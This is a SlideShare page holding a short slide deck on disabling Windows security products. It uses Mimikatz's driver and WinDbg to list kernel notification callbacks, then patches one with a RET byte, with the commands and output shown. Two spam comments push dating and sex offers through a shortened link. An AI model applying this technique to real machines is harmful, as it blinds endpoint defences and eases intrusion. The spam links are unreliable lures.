O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Killing any security product … using a Mimikatz undocumented feature

5.749 visualizações

Publicada em

Publicada em: Tecnologia
  • Follow the link, new dating source: ❶❶❶ http://bit.ly/39sFWPG ❶❶❶
       Responder 
    Tem certeza que deseja  Sim  Não
    Insira sua mensagem aqui
  • Sex in your area is here: ❶❶❶ http://bit.ly/39sFWPG ❶❶❶
       Responder 
    Tem certeza que deseja  Sim  Não
    Insira sua mensagem aqui

Killing any security product … using a Mimikatz undocumented feature

  1. 1. Killing any security product … using a Mimikatz undocumented feature @newsoft
  2. 2. How to write a security product for Windows? “There is only one way to do it” … since Windows Vista
  3. 3. How to write a security product for Windows? ObRegisterCallbacks PsSetCreateProcessNotifyRoutine (process) PsSetCreateProcessNotifyRoutineEx PsSetCreateThreadNotifyRoutine (thread) PsSetCreateThreadNotifyRoutineEx PsSetLoadImageNotifyRoutine CmRegisterCallback (registry) CmRegisterCallbackEx FltRegisterFilter (file) FltStartFiltering
  4. 4. Finding process callbacks with WinDbg kd> dd nt!PspCreateProcessNotifyRoutineCount l1 fffff800`02a821a4 00000005 kd> dd nt!PspCreateProcessNotifyRoutineExCount l1 fffff800`02a821a0 00000002 kd> dp nt!PspCreateProcessNotifyRoutine l8 fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
  5. 5. Other callbacks kd> dd nt!PspCreatethreadNotifyRoutineCount l1 <<< Thread fffff800`02a81f80 00000000 kd> dd nt!PspLoadImageNotifyRoutineCount l1 <<< Image load fffff800`02a81d60 00000002 kd> dp nt!PspLoadImageNotifyRoutine l3 fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf fffff800`02a81d30 00000000`00000000 kd> dd nt!CmpCallBackCount l1 <<< Registry fffff800`02a63b04 00000001 kd> x nt!CallbackListHead fffff800`02ad8970 nt!CallbackListHead = <no type information>
  6. 6. We need automation! Enter Mimikatz magic ...
  7. 7. Magic command #1 mimikatz # !+ [*] mimikatz driver not present [+] mimikatz driver successfully registered [+] mimikatz driver ACL to everyone [+] mimikatz driver started
  8. 8. Magic command #2 mimikatz # !notifObject ... * Process * Callback [type 3] PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0] Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300] Close - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010] Delete - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0] Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0] ...
  9. 9. Back in WinDbg kd> e ehdrv+0x0001c6e0 c3 0xC3 == RET opcode After this patch, the notification callback will do nothing Unlinking from the callbacks list is also doable ● Requires more work ... ● … but is less detectable (no code alteration)
  10. 10. Conclusion Cons ● You need kernel write access ○ Being able to write a single NULL byte is enough, though Pros ● Will kill any security tool ● The software will still be “active and running” from a monitoring point of view - just not being notified

×